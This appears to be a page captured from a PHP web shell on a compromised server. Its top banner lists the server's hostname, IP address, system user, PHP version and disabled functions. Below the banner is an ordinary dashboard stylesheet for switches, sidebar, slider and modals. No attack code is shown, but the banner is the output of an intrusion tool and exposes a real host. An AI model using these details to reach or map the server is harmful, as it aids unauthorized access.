Uname:
Linux server.thebazaar99.com 5.14.0-687.17.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jun 22 07:21:26 EDT 2026 x86_64
Software:
Apache
PHP version:
8.3.32 [ PHP INFO ] PHP os:
Linux
Server Ip:
163.227.92.254
Your Ip:
216.73.217.24
User:
gutlooks (1003) | Group:
gutlooks (1005)
Safe Mode:
OFF
Disable Function:
exec,passthru,shell_exec,system
/*switch Button coading*/
.switch {
position: relative;
display: inline-block;
width: 50px;
height: 30px;
}
.switch input {display:none;}
.slider {
position: absolute;
cursor: pointer;
top: 2px;
left: 0;
right: -4px;
bottom: 0;
background-color: #d9534f;
-webkit-transition: .4s;
transition: .4s;
}
.slider:before {
position: absolute;
content: "";
height: 20px;
width: 20px;
left: 4px;
bottom: 4px;
background-color: white;
-webkit-transition: .4s;
transition: .4s;
}
input:checked + .slider {
background-color: #449d44;
}
input:focus + .slider {
box-shadow: 0 0 1px #d9534f;
}
input:checked + .slider:before {
-webkit-transform: translateX(26px);
-ms-transform: translateX(26px);
transform: translateX(26px);
}
/* Rounded sliders */
.slider.round {
border-radius: 34px;
}
.slider.round:before {
border-radius: 50%;
}
/*ennd switch button code*/
.scrollbar {height:150px;overflow-y:scroll;}
.orange {
background: #FC7303;
}
.label-employer-das {
width: 100%;
float: left;
margin: 0 0 20px 0px;
text-align: center;
padding: 15px 0 5px 0px;
border-radius: 3px;
}
.label-employer-das h5 {
font-size: 25px;
font-weight: 600;
color: #fff;
}
.label-employer-das p {
font-size: 14px;
font-weight: 600;
color: #fff;
}
.blue {
background: #4D41F1;
}
.purple {
background: #AA4CF2;
}
.sidebar { margin-right: 30px; margin-left: -20px; }
.sidebar ul { background: #383838; }
.sidebar ul li{ background: #383838; padding:15px 0px 15px 25px;}
.sidebar ul li a{ color: #fff; font-weight: 400; font-size: 16px; }
.nav-b{ background: #B8B8B8; }
.nav-b a{ color: #fff;}
ul#drop-ul {
display: none;
}
li.main-li { position: relative; }
li.main-li i{ position: absolute; right: 40px; top: 16px; z-index: 999;}
/*.sidebar ul li:after{
display: inline-block;
width: 0; z-index: 9999;
height: 0;
margin-left: .3em;
vertical-align: middle;
content: "";
border-top: .3em solid #fff;
border-right: .3em solid transparent;
border-left: .3em solid transparent;
margin-left: 20px;
}*/
#slider {
-webkit-appearance: none;
width: 100%;
height: 20px;
border-radius: 20px;
-webkit-transition: .2s;
transition: opacity .2s;
margin: 15px 0;
background:#fff;
}
.ui-widget-header
{
background: #0071B8 !important;
}
.ui-state-default, .ui-widget-content .ui-state-default, .ui-widget-header .ui-state-default, .ui-button, html .ui-button.ui-state-disabled:hover, html .ui-button.ui-state-disabled:active
{
background: #fff !important; height:30px !important; width: 30px !important; border-radius: 15px;
}
#slider:after
{
content: '0K'; position: absolute; z-index: 1; left: 0; top: -25px; font-size: 12px; font-weight: 700;
}
#slider:before
{
content: '120K'; position: absolute; z-index: 1; right: 0; top: -25px; font-size: 12px; font-weight: 700;
}
.main-popup{ width: 500px; margin: auto; background: red; min-height: 150px;
position: fixed; top: 50%; left: 50%; transform: translate(-50%,-50%);
z-index: 999; display: none;}
.exit{ float: right; }
.detail{ width: 100%; float: left; }
.modal-dialog{ max-width: 690px; overflow-y: scroll; height: 600px;}
.modal-body table { width: 100%; float: left; }
.modal-body table tr{ border: 1px solid #ddd; border-collapse: collapse;
border-radius: 5px;}
.modal-body table tr td:first-child{ border-right: 1px solid #ddd; width: 40%;}
.modal-body table tr td:last-child{ width: 60%; }
.modal-body table td{ float: left;
padding: 6px 10px;
}